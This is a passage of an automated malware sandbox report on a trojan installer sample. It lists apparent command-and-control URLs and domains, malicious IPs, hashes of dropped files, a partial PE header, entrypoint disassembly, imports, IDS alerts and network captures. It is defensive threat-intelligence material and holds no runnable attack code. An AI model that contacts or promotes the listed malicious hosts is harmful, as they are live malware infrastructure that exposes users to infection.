                        http://www.fastbest.host/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzomtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.assisttm.com/n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQhfalse
                        • Avira URL Cloud: safe
                        		unknown
                        www.tgalegail.quest/n6fr/true
                        • Avira URL Cloud: safe
                        		low
                        http://www.yr-golf.com/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBBfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://fastbest.hostcscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nsis.sf.net/NSIS_ErrorY1p8VPvyU2.exefalse
                          		high
                          http://nsis.sf.net/NSIS_ErrorErrorY1p8VPvyU2.exefalse
                            		high
                            https://browsehappy.com/cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpfalse
                              		high
                              http://www.tyjgfuke.com/$tcscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.tyjgfuke.com/n6fr/?r8Yhe8X=LSrsi9BeeNNPJfOX4A9nLsTLbEdx4M4dJGVYJBtcscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://via.placeholder.com/100cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpfalse
                                		high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                34.102.136.180
                                		assisttm.comUnited States
                                		15169GOOGLEUSfalse
                                23.110.214.34
                                		www.tyjgfuke.comUnited States
                                		395954LEASEWEB-USA-LAX-11UStrue
                                45.8.125.8
                                		www.fastbest.hostRussian Federation
                                		49505SELECTELRUtrue

                                General Information

                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:532909
                                Start date:02.12.2021
                                Start time:19:58:13
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 9m 29s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Y1p8VPvyU2 (renamed file extension from none to exe)
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:21
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@7/2@7/3
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 21.8% (good quality ratio 19.7%)
                                • Quality average: 74.7%
                                • Quality standard deviation: 31.6%
                                HCA Information:
                                • Successful, ratio: 87%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                www.fastbest.hostMedtronics Product catalog and prices_pdf.exeGet hashmaliciousBrowse
                                • 194.54.163.227

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                LEASEWEB-USA-LAX-11USRFQ - SST#2021111503.exeGet hashmaliciousBrowse
                                • 108.187.86.48
                                YjKK5XYBzBGet hashmaliciousBrowse
                                • 172.255.161.176
                                JUyE95BLaLGet hashmaliciousBrowse
                                • 172.255.161.168
                                9hyE41yNDBGet hashmaliciousBrowse
                                • 23.86.78.90
                                triage_dropped_file.exeGet hashmaliciousBrowse
                                • 23.110.31.106
                                vbc.exeGet hashmaliciousBrowse
                                • 23.110.31.106
                                xd.x86Get hashmaliciousBrowse
                                • 23.80.138.175
                                eKmL8hvXz2Get hashmaliciousBrowse
                                • 108.187.220.76
                                TsOl2c6Yc6Get hashmaliciousBrowse
                                • 23.83.26.237
                                SALES CONFIRMATION 153_154 SN.xlsxGet hashmaliciousBrowse
                                • 23.110.31.106
                                oQANZnrt9dGet hashmaliciousBrowse
                                • 23.83.26.245
                                xzKS6P1qDo.exeGet hashmaliciousBrowse
                                • 23.104.53.233
                                apep.mipsGet hashmaliciousBrowse
                                • 108.187.80.246
                                7H5yVEypQXGet hashmaliciousBrowse
                                • 23.85.79.155
                                7OjVU04f8q.exeGet hashmaliciousBrowse
                                • 23.110.31.75
                                DuxgwH47QB.exeGet hashmaliciousBrowse
                                • 23.110.128.234
                                ORDER.docGet hashmaliciousBrowse
                                • 23.110.128.234
                                SWIFT-MLSB-11,546__doc.exeGet hashmaliciousBrowse
                                • 23.110.95.195
                                BwJriVGrt5.exeGet hashmaliciousBrowse
                                • 23.110.31.77
                                29383773738387477474774.exeGet hashmaliciousBrowse
                                • 142.234.161.17
                                SELECTELRUuATT8vAUK9.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                1Y0xc70fbX.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                SecuriteInfo.com.Packed-GDV0304D0F07C5D.24466.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                SecuriteInfo.com.W32.AIDetect.malware1.19028.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                8VvzOu0uHY.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                koCttsCjGY.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                oCBC1EaZ9G.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                LF6pwW1lIz.exeGet hashmaliciousBrowse
                                • 37.9.13.169
                                DvWDF1pMu7.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                gSSvIiK2kn.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                gjYAgorDLm.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                zPeXh7zbd3.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                2KWErWhXoQ.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                Nh3xqMPynb.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                MN5wZ55I17.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                QMn13jz6nj.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                v72n86vFFq.exeGet hashmaliciousBrowse
                                • 95.213.165.249
                                DOC-BRAD _ 26TH_NOVEMBER_2021 _.HTMGet hashmaliciousBrowse
                                • 92.53.68.205
                                t2yFh0lOxM.exeGet hashmaliciousBrowse
                                • 185.189.167.130
                                vwLliS25F5.exeGet hashmaliciousBrowse
                                • 95.213.165.229

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dllproduct list.xlsxGet hashmaliciousBrowse
                                  C:\Users\user\AppData\Local\Temp\6jgsfkran1lw1product list.xlsxGet hashmaliciousBrowse

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Temp\6jgsfkran1lw1
                                    Process:C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    File Type:DOS executable (COM, 0x8C-variant)
                                    Category:dropped
                                    Size (bytes):217235
                                    Entropy (8bit):7.9937809161987765
                                    Encrypted:true
                                    SSDEEP:6144:W4FmTjet9fxOzh9Ky33TDMfVwr37hQnll6V:GE9YzhogvMfm3olI
                                    MD5:75ACE7B8440CE829D653343E18EAE33A
                                    SHA1:09F23DD8962701C4D5213E2A7AA395985E8963DE
                                    SHA-256:A4CAE10880D0DD180CC5B92E38F449EE244E83186725BD1257312DCC05AA4E48
                                    SHA-512:F4BC54E1396D9AF6E61ED270B068D60475F357BD3258ABF4E659D75FD81D27D173BBB2126D646BA51736B3EA82CEC03F5D4A1D9D8FEFC6E1599333827B7AB2A0
                                    Malicious:false
                                    Joe Sandbox View:
                                    • Filename: product list.xlsx, Detection: malicious, Browse
                                    Reputation:low
                                    Preview: ..;.7w.GJ0s...TS.G.4.%..zI..E..,...f.....be.........T{..;Q...........";.D=..Z.t...!...Gkl..Jy...;.G.......4.$...5.\..}M&......B.#}..f...\...fj.=4.8.@..........d.JmH...8A...Ua6..G...vr.jC..c..\.^ .......w...y..1.6....j#.B}.G.Z=..I.O.. .".XN...]..7w.\..............G..E.T.,k...f..,..be........&T{...E......W..U^.j...}...N..oU.y........P)..... P..S%..4.$...5....,.....9...D..F?..^.e.c..`c.m.@o.%n_8.L..l:..w.8A...U..D...v..jC..c......?..q...w...y....@....j.B}.J.Zx..I.O.....".XN....]..7w.y..K............3..E..,...f.....be........&T{...E......W..U^.j...}...N..oU.y........P)..... P..S%..4.$...5....,.....9...D..F?..^.e.c..`c.m.@o.%n_8.L..lJmH...8AV..U..D.n..vr.jC..c......?..q...w...y....@....j.B}.J.Zx..I.O.....".XN....]..7w.y..K............3..E..,...f.....be........&T{...E......W..U^.j...}...N..oU.y........P)..... P..S%..4.$...5....,.....9...D..F?..^.e.c..`c.m.@o.%n_8.L..lJmH...8AV..U..D.n..vr.jC..c......?..q...w...y....@....
                                    C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll
                                    Process:C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):137728
                                    Entropy (8bit):6.411397085063496
                                    Encrypted:false
                                    SSDEEP:1536:gmPsLrHeJTgGJPLlr0VOGfTRisu0/8UgCUoXD2/Y+z4o8QqbfvZ2BksWjcd8EmjN:sLz0gGJPprwr/dXDZE2Z2B8E8
                                    MD5:4881ED27473CD15B3FCC072F11465658
                                    SHA1:37A29E690965E233CA4B89538A77188DC2048BFF
                                    SHA-256:13FA843E8D2B2E3A9699F9F71A8AD152EA94995B1045891B6B91CFA9674B69F8
                                    SHA-512:ED198137652861DB9A6595FEDC6E376EA2BC730E5D6BC8D58B203F07814200529597AD5B24EE8409942222CB18674DDE38422B82FFCD057E63ACC9233E6EAFF3
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Joe Sandbox View:
                                    • Filename: product list.xlsx, Detection: malicious, Browse
                                    Reputation:low
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;6.A.W...W...W..r.s.^W..r.M.oW..r.r..W....\.|W....Y.lW...W...W......~W......~W....m.~W......~W..Rich.W..................PE..L....R.a...........!.........................................................p......T...................................L............`..............................0...............................P...@...............<............................text...L........................... ..`.rdata...R.......T..................@..@.data....U.......:..................@....rsrc........`......................@..B........................................................................................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Entropy (8bit):7.939366323187133
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Y1p8VPvyU2.exe
                                    File size:318467
                                    MD5:83be105c9fa2427bd6079f5d19659596
                                    SHA1:1430baa740d2cd40a507cbfa8fe62e3d78424315
                                    SHA256:8cd6125941710166af38133bce6cae9f9cc41c8d88ff774cd691081d193015a1
                                    SHA512:09a2c3c9d9b147e6c25d824c931b2c0f4f9daaccdbde4a28ad0955be63642e11cb23df8f1d85e719b2b0b535e55b0d2cfb7168312c0f082d8b4f9d1072efdd3e
                                    SSDEEP:6144:rGiw8TRbniXVRaPCuyCxGfYy33TGBbXU2gx7hQn+l6aFu00D/4e3aKize/q:bTwXVRACauYgFo+q0K4VKizR
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                                    File Icon

                                    Icon Hash:b2a88c96b2ca6a72

                                    Static PE Info

                                    General

                                    Entrypoint:0x4030e3
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:7fa974366048f9c551ef45714595665e

                                    Entrypoint Preview

                                    Instruction
                                    sub esp, 00000180h
                                    push ebx
                                    push ebp
                                    push esi
                                    xor ebx, ebx
                                    push edi
                                    mov dword ptr [esp+18h], ebx
                                    mov dword ptr [esp+10h], 00409158h
                                    xor esi, esi
                                    mov byte ptr [esp+14h], 00000020h
                                    call dword ptr [00407030h]
                                    push 00008001h
                                    call dword ptr [004070B0h]
                                    push ebx
                                    call dword ptr [0040727Ch]
                                    push 00000008h
                                    mov dword ptr [0042EC18h], eax
                                    call 00007F6505057D48h
                                    mov dword ptr [0042EB64h], eax
                                    push ebx
                                    lea eax, dword ptr [esp+34h]
                                    push 00000160h
                                    push eax
                                    push ebx
                                    push 00428F90h
                                    call dword ptr [00407158h]
                                    push 0040914Ch
                                    push 0042E360h
                                    call 00007F65050579FFh
                                    call dword ptr [004070ACh]
                                    mov edi, 00434000h
                                    push eax
                                    push edi
                                    call 00007F65050579EDh
                                    push ebx
                                    call dword ptr [0040710Ch]
                                    cmp byte ptr [00434000h], 00000022h
                                    mov dword ptr [0042EB60h], eax
                                    mov eax, edi
                                    jne 00007F650505522Ch
                                    mov byte ptr [esp+14h], 00000022h
                                    mov eax, 00434001h
                                    push dword ptr [esp+14h]
                                    push eax
                                    call 00007F65050574E0h
                                    push eax
                                    call dword ptr [0040721Ch]
                                    mov dword ptr [esp+1Ch], eax
                                    jmp 00007F6505055285h
                                    cmp cl, 00000020h
                                    jne 00007F6505055228h
                                    inc eax
                                    cmp byte ptr [eax], 00000020h
                                    je 00007F650505521Ch
                                    cmp byte ptr [eax], 00000022h
                                    mov byte ptr [eax+eax+00h], 00000000h

                                    Rich Headers

                                    Programming Language:
                                    • [EXP] VC++ 6.0 SP5 build 8804

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x900.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x5b680x5c00False0.67722486413data6.48746502716IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rdata0x70000x129c0x1400False0.4337890625data5.04904254867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x90000x25c580x400False0.58203125data4.76995537906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc0x370000x9000xa00False0.4078125data3.93441125971IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_ICON0x371900x2e8dataEnglishUnited States
                                    RT_DIALOG0x374780x100dataEnglishUnited States
                                    RT_DIALOG0x375780x11cdataEnglishUnited States
                                    RT_DIALOG0x376980x60dataEnglishUnited States
                                    RT_GROUP_ICON0x376f80x14dataEnglishUnited States
                                    RT_MANIFEST0x377100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                    Imports

                                    DLLImport
                                    KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                    SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                    ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    12/02/21-20:00:36.476668TCP1201ATTACK-RESPONSES 403 Forbidden804977734.102.136.180192.168.2.3
                                    12/02/21-20:00:41.788599TCP1201ATTACK-RESPONSES 403 Forbidden804979334.102.136.180192.168.2.3

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 2, 2021 20:00:36.216691971 CET4977780192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:36.233905077 CET804977734.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:36.234029055 CET4977780192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:36.234204054 CET4977780192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:36.251166105 CET804977734.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:36.476667881 CET804977734.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:36.476706028 CET804977734.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:36.476895094 CET4977780192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:36.476938963 CET4977780192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:36.786031008 CET4977780192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:36.804990053 CET804977734.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:41.523844957 CET4979380192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:41.543034077 CET804979334.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:41.543169975 CET4979380192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:41.543401957 CET4979380192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:41.562285900 CET804979334.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:41.788599014 CET804979334.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:41.788650990 CET804979334.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:41.788954020 CET4979380192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:41.789102077 CET4979380192.168.2.334.102.136.180
                                    Dec 2, 2021 20:00:41.808116913 CET804979334.102.136.180192.168.2.3
                                    Dec 2, 2021 20:00:52.034548998 CET4980880192.168.2.323.110.214.34
                                    Dec 2, 2021 20:00:55.037508965 CET4980880192.168.2.323.110.214.34
                                    Dec 2, 2021 20:01:01.038088083 CET4980880192.168.2.323.110.214.34
                                    Dec 2, 2021 20:01:16.960594893 CET4980980192.168.2.323.110.214.34
                                    Dec 2, 2021 20:01:18.362354040 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.433792114 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.436881065 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.436930895 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.508413076 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510102034 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510129929 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510266066 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510354042 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510484934 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510514975 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510546923 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:18.510771036 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.510786057 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.510788918 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.510791063 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.510792971 CET4981080192.168.2.345.8.125.8
                                    Dec 2, 2021 20:01:18.581895113 CET804981045.8.125.8192.168.2.3
                                    Dec 2, 2021 20:01:19.968739033 CET4980980192.168.2.323.110.214.34
                                    Dec 2, 2021 20:01:25.969937086 CET4980980192.168.2.323.110.214.34

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 2, 2021 20:00:36.186220884 CET4957253192.168.2.38.8.8.8
                                    Dec 2, 2021 20:00:36.210366011 CET53495728.8.8.8192.168.2.3
                                    Dec 2, 2021 20:00:41.495348930 CET6082353192.168.2.38.8.8.8
                                    Dec 2, 2021 20:00:41.519289017 CET53608238.8.8.8192.168.2.3
                                    Dec 2, 2021 20:00:46.807691097 CET5510253192.168.2.38.8.8.8
                                    Dec 2, 2021 20:00:46.831301928 CET53551028.8.8.8192.168.2.3
                                    Dec 2, 2021 20:00:51.858485937 CET5652753192.168.2.38.8.8.8
                                    Dec 2, 2021 20:00:52.032300949 CET53565278.8.8.8192.168.2.3
                                    Dec 2, 2021 20:01:16.770849943 CET4955953192.168.2.38.8.8.8
                                    Dec 2, 2021 20:01:16.942539930 CET53495598.8.8.8192.168.2.3
                                    Dec 2, 2021 20:01:18.165642023 CET5265053192.168.2.38.8.8.8
                                    Dec 2, 2021 20:01:18.359935045 CET53526508.8.8.8192.168.2.3
                                    Dec 2, 2021 20:01:23.519859076 CET5836153192.168.2.38.8.8.8
                                    Dec 2, 2021 20:01:23.555322886 CET53583618.8.8.8192.168.2.3

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Dec 2, 2021 20:00:36.186220884 CET192.168.2.38.8.8.80x10baStandard query (0)www.yr-golf.comA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:00:41.495348930 CET192.168.2.38.8.8.80xc7e4Standard query (0)www.assisttm.comA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:00:46.807691097 CET192.168.2.38.8.8.80x498eStandard query (0)www.gsjbd1.clubA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:00:51.858485937 CET192.168.2.38.8.8.80x9dd7Standard query (0)www.tyjgfuke.comA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:01:16.770849943 CET192.168.2.38.8.8.80x9969Standard query (0)www.tyjgfuke.comA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:01:18.165642023 CET192.168.2.38.8.8.80x7c7dStandard query (0)www.fastbest.hostA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:01:23.519859076 CET192.168.2.38.8.8.80xe521Standard query (0)www.caixadepandora.clubA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Dec 2, 2021 20:00:36.210366011 CET8.8.8.8192.168.2.30x10baNo error (0)www.yr-golf.comyr-golf.comCNAME (Canonical name)IN (0x0001)
                                    Dec 2, 2021 20:00:36.210366011 CET8.8.8.8192.168.2.30x10baNo error (0)yr-golf.com34.102.136.180A (IP address)IN (0x0001)
                                    Dec 2, 2021 20:00:41.519289017 CET8.8.8.8192.168.2.30xc7e4No error (0)www.assisttm.comassisttm.comCNAME (Canonical name)IN (0x0001)
                                    Dec 2, 2021 20:00:41.519289017 CET8.8.8.8192.168.2.30xc7e4No error (0)assisttm.com34.102.136.180A (IP address)IN (0x0001)
                                    Dec 2, 2021 20:00:46.831301928 CET8.8.8.8192.168.2.30x498eName error (3)www.gsjbd1.clubnonenoneA (IP address)IN (0x0001)
                                    Dec 2, 2021 20:00:52.032300949 CET8.8.8.8192.168.2.30x9dd7No error (0)www.tyjgfuke.com23.110.214.34A (IP address)IN (0x0001)
                                    Dec 2, 2021 20:01:16.942539930 CET8.8.8.8192.168.2.30x9969No error (0)www.tyjgfuke.com23.110.214.34A (IP address)IN (0x0001)
                                    Dec 2, 2021 20:01:18.359935045 CET8.8.8.8192.168.2.30x7c7dNo error (0)www.fastbest.host45.8.125.8A (IP address)IN (0x0001)
                                    Dec 2, 2021 20:01:23.555322886 CET8.8.8.8192.168.2.30xe521No error (0)www.caixadepandora.club137.184.111.224A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.yr-golf.com
                                    • www.assisttm.com
                                    • www.fastbest.host

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
